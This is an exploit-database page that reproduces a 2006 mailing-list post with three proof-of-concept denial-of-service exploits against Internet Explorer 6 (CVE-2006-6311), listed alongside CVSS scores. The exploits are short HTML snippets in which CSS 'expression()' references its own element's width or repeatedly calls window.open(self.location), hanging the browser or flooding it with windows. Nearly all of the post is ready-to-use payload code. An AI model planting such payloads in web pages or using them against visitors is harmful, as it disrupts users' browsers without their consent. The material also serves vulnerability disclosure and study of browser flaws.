Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)

2006.12.07
Credit: J. Carlos Niet (xiamo)
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-6311
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Note: I'm sorry, two of the the exploits in the prior e-mail were incomplete. This is just another couple of proof of concept exploits for this well-known browser. The third one is a lame combination of both. Tested under Windows XP SP2, MSIE 6.0.2900.2180 Exploit 1 <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(document.getElementById('foo').offsetWidth+'px');"> <tr><td></td></tr> </table> </div> Exploit 2 <div style="width: expression(window.open(self.location));"> </div> Exploit 3 <html> <head> <title>Another non-standards compliant IE D.O.S.</title> </head> <body> <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById( 'foo').offsetWidth+'px');"> <tr> <td> IE makes my life harder :(. It sucks, don't use it :). </td> </tr> </table> </div> Written by <a href="http://xiam.be">xiam</a>.<br /> Tested under IE 6.0.2900.2180 </body> </html> -- La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire - J. Carlos Niet (xiamo). http://xiam.be


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top